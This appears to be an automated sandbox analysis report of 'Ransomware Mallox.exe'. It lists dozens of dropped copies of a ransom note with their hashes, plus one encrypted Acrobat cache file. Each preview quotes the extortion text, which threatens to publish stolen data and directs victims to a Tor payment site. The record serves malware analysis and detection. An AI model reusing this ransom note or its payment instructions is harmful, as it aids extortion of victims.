                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Videos\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Public\AccountPictures\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Public\Downloads\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Public\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Public\Libraries\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\.ms-ad\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\3D Objects\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\ARM\Acrobat_23.006.20320\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\ARM\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\ARM\S\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):227110
                    Entropy (8bit):7.999065484083436
                    Encrypted:true
                    SSDEEP:6144:lLvP0D6cualIGTUg52M3B3RxrZYCJ+bYR97K:Jv2Bualpx52M3FPrOC6YQ
                    MD5:FE42A6121F6216494AE27D2F8FBDA1AB
                    SHA1:84CBBCDC33990B6079E77DA9110F0CF8A548EBE6
                    SHA-256:511000E1B54F2EAF38F4F313056CA61CCF8D06F760B4D4D7B08F7BC1AEF22163
                    SHA-512:74CF3F92D7F8154F8E8E06F47618E7A64788F7588D41EC488A821615AE728A40898891E9899EE48E70D5CE5372CF4EE7E7D0E2DCAFE0EFBA78CFF909635C718F
                    Malicious:true
                    Preview:...=N)R.M.TRg..D.....N.y.y..8P.n..|..y...G.B.\...E;.3..?.K .....].R.n.P......}..y....W4. ..3b?..t...[...z.D+.*.t..[..= +oV2d...tmq....W...YXwm..hUH.....,+C\vj..k...k.....Os..?..1."...Q..K.q.....j....X%.2...].z...q...........)b.!....P..~..X.(..j.`x....p..LK.+r....c....G...?.z.t.........q...iuj.u1v~...u...\.....e7..'.<......b.j..O.(,."..O..-.M.H7o;..E..d.@...g.KB.o............p%.x.5u...{R.J.<.^.v..7....v...+.....dm7H....0O.....2.0...ff..&W....+.+0.X.h....?....~4.K.....Ud...E....t......n.x...A|..)8Ty/^..D.`...z..7.)^^..^./.,^.>..P.Q'.T...G)........0..X. ..X..r.E..1X.....On/,.O...w{t.I.M.....P\.jt..Q!A.a.....hE..........pN.5.~3..e.Tw..K.OI...{.....=../O...0..G.....n.-M.K!.......e...y.H;o..0a,..*..f[........u)u..7.F.a...2..Y.H...,.bx\......R..".....:.........W.zg.S.........:.i.Y..,rbi)..k.=Y....ud..:*|e.<......d...]}1..6..w=YA...X.V...../.m....,o...w..<.j...2.c.{.}.Q.T..'n.....M..=.T..%.t3h...s.Pf..?.....~....`P/.F..G.X+H.. &.Zv{..x...@.*..g....

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
